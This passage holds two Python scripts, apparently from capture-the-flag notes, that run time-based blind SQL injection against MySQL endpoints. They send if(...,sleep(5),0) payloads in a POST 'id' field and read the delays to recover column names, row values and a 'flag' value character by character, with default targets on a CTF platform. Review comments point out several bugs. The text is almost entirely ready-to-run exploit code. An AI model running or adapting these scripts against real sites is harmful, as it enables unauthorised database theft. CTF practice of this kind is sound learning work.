            payload = "if((select length(column_name) from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "' limit " + str(a) + ",1)=" + str(columnLen) + ",sleep(5),0)"
            data = {
                'id': payload,
            }
            timeStart = time.time()
            res = conn.post(url, data=data)
            timeEnd = time.time()
            if timeEnd - timeStart >= 5:
                break
        # b is the 1-based position inside the column name being guessed
        for b in range(1, columnLen + 1):
            # c walks printable ASCII 33..127, one request per candidate
            for c in range(33, 128):
                time.sleep(0.05)
                timeStart = time.time()
                payload = "if(ascii(substr((select column_name from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "' limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"
                data = {
                    'id': payload,
                }
                res = conn.post(url, data=data)
                timeEnd = time.time()
                if timeEnd - timeStart >= 5:
                    column += chr(c)
                    print(column)
                    break
        # Publish the recovered name through the global list
        DBColumns.append(column)
        # Reset the buffer before the next column name
        column = ""


# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
    """Dump the values of one column, row by row, via time-based blind probes.

    url:      endpoint that accepts a POST form with a single ``id`` field.
    dbtable:  table name spliced verbatim into the query.
    dbcolumn: column name spliced verbatim into the query.
    Side effect: each recovered value is appended to DBData[dbcolumn]; the
    whole dict is printed after every row.  Each probe is preceded by a
    50 ms pause.
    """
    global DBData
    # Round 1: how many rows the column has, candidates 0..98
    DBDataCount = 0
    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    for DBDataCount in range(99):
        time.sleep(0.05)
        payload = "if((select count(" + dbcolumn + ") from " + dbtable + ")=" + str(DBDataCount) + ",sleep(5),0)"
        data = {
            'id': payload,
        }
        timeStart = time.time()
        res = conn.post(url, data=data)
        timeEnd = time.time()
        if timeEnd - timeStart >= 5:
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
            break
    # a is the 0-based row index (LIMIT a,1).
    # NOTE(review): the SELECT has no ORDER BY, so which row LIMIT a,1 returns
    # is up to the server; rows may repeat or be skipped between probes.
    for a in range(0, DBDataCount):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a + 1))
        # Round 2: length of this value, candidates 0..98
        dataLen = 0
        for dataLen in range(99):
            time.sleep(0.05)
            payload = "if((select length(" + dbcolumn + ") from " + dbtable + " limit " + str(a) + ",1)=" + str(dataLen) + ",sleep(5),0)"
            data = {
                'id': payload,
            }
            timeStart = time.time()
            res = conn.post(url, data=data)
            timeEnd = time.time()
            if timeEnd - timeStart >= 5:
                print("[-]第{0}个数据长度为:{1}".format(a + 1, dataLen))
                break
        # Scratch buffer for the value being assembled (data is already the form dict)
        data1 = ""
        # Round 3: the characters of the value
        # b is the 1-based position inside the value being guessed
        for b in range(1, dataLen + 1):
            for c in range(33, 128):
                time.sleep(0.05)
                payload = "if(ascii(substr((select " + dbcolumn + " from " + dbtable + " limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"
                data = {
                    'id': payload,
                }
                timeStart = time.time()
                # NOTE(review): this is the only request in the script sent with
                # conn.get (with a data= body); every other probe uses conn.post.
                res = conn.get(url, data=data)
                timeEnd = time.time()
                if timeEnd - timeStart >= 5:
                    data1 += chr(c)
                    print(data1)
                    break
        # Store under the column name; the value is the list of recovered rows
        DBData.setdefault(dbcolumn, []).append(data1)
        print(DBData)
        # Reset the buffer before the next row
        data1 = ""


# 盲注主函数
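def StartSqli(url):
    """Run the enumeration steps in order and let the user choose what to dump.

    Calls GetDBName, GetDBTables, GetDBColumns and GetDBData in sequence; the
    helpers publish their results through the module globals DBName,
    DBTables, DBColumns and DBData.  Table and column choices are read from
    stdin as 1-based indexes; entering 0 at the column prompt ends the loop.

    url: target URL handed unchanged to every helper.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for pos, name in enumerate(DBTables, start=1):
        print("(" + str(pos) + ")" + name)
    # Prompts are 1-based for the user; the lists are 0-based.
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    chosenTable = DBTables[tableIndex]
    GetDBColumns(url, DBName, chosenTable)
    while True:
        print("[+]数据表{0}的字段如下:".format(chosenTable))
        # Plain listing of already-recovered names: no request is sent here, so
        # the per-request time.sleep(0.05) pacing used by the helpers was
        # dropped from this loop -- it only slowed down printing.
        for pos, name in enumerate(DBColumns, start=1):
            print("(" + str(pos) + ")" + name)
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        # 0 from the user becomes -1 here and ends the loop.
        if columnIndex == -1:
            break
        GetDBData(url, chosenTable, DBColumns[columnIndex])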


if __name__ == '__main__':
    # Entry point: read the target URL from -u/--url and run StartSqli on a worker thread.
    try:
        parser = OptionParser("./BlindTime_get.py -u url")
        parser.add_option(
            '-u', '--url',
            dest='url',
            default='http://1e21f92c-e6dd-42ac-95f0-ed1281e49749.node4.buuoj.cn:81/',
            type='string',
            help='target URL',
        )
        options, _ = parser.parse_args()
        url = options.url
        # NOTE(review): the except below only covers option parsing and thread
        # start-up; once the worker is running, a Ctrl-C in the main thread is
        # not expected to stop it.
        worker = threading.Thread(target=StartSqli, args=(url,))
        worker.start()
    except KeyboardInterrupt:
        print("Interrupted by keyboard inputting!!!")

时间盲注-POST-1(知表知字段求flag)

#!/usr/bin/python3
# -*- coding: utf-8 -*-

import requests
from optparse import OptionParser
import time
import threading


# Database name holder, kept from the fuller script; nothing in this file writes it
DBName = ""
# Table-name list, kept from the fuller script; unused here
DBTables = []
# Column-name list, kept from the fuller script; unused here
DBColumns = []
# Dump dict keyed by column name, kept from the fuller script; unused here
DBData = {}

# Author's intent: raise the retry count and disable keep-alive so the many
# short requests do not run into "Max retries exceeded with url".
# NOTE(review): HTTPAdapter binds DEFAULT_RETRIES as a default argument at import
# time, and requests.Session has no keep_alive attribute, so neither assignment is
# expected to change connection behaviour -- confirm against the installed requests.
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False

def woqv(url):
	"""Read the value of column ``flag`` in table ``flag`` one character at a time.

	url: endpoint that accepts a POST form with a single ``id`` field.
	Positions 1..49 are tried in order with no length probe; for each
	position the printable ASCII range 33..126 is tested one request at a
	time, and a round trip of >= 5 s means the candidate matched.  The
	accumulated value is printed after every hit; nothing is returned.
	NOTE(review): the indentation of the ``for kk`` and ``time.sleep`` lines
	appears to mix spaces and tabs, which Python 3 rejects as a TabError --
	check whether this is a paste artefact before running the file.
	"""
	# Accumulates the recovered characters
	a=""
	# NOTE(review): stale message copied from GetDBName; no length is probed here
	print("[-]开始获取数据库名长度")
	# ll is the 1-based substr() position; a position with no hit is silently
	# skipped, so the output can end up shorter than the real value
	for ll in range(1, 50):
 		for kk in range(33,127):
	 		time.sleep(0.05)
			# Start of the round trip
			timeStart = time.time()
			payload = "if((ascii(substr((select(flag)from(flag))," + str(ll) + ",1))=" + str(kk) + "),sleep(5),0)"
			# Stale example from the uname-based script; this payload has no prefix or "#"
			data = {
				'id':payload,
			}
			res = conn.post(url,data=data)
			# End of the round trip
			timeEnd = time.time()
			# Timing oracle: >= 5 s is taken as "matched"; latency can cause false positives
			if timeEnd - timeStart >= 5:
				a+=chr(kk)
				print(a)
				break
			



# 盲注主函数
def StartSqli(url):
	"""Entry point used by the worker thread; delegates straight to woqv."""
	return woqv(url)

if __name__ == '__main__':
	# Entry point: read the target URL from -u/--url and run StartSqli on a worker thread.
	try:
		parser = OptionParser("./BlindTime_get.py -u url")
		parser.add_option(
			'-u', '--url',
			dest='url',
			default='http://4fbbc7a5-c5b9-4628-b997-a2c82c97252d.node4.buuoj.cn:81/',
			type='string',
			help='target URL',
		)
		options, _ = parser.parse_args()
		url = options.url
		# NOTE(review): the except below only covers option parsing and thread
		# start-up; once the worker is running, a Ctrl-C in the main thread is
		# not expected to stop it.
		worker = threading.Thread(target=StartSqli, args=(url,))
		worker.start()
	except KeyboardInterrupt:
		print("Interrupted by keyboard inputting!!!")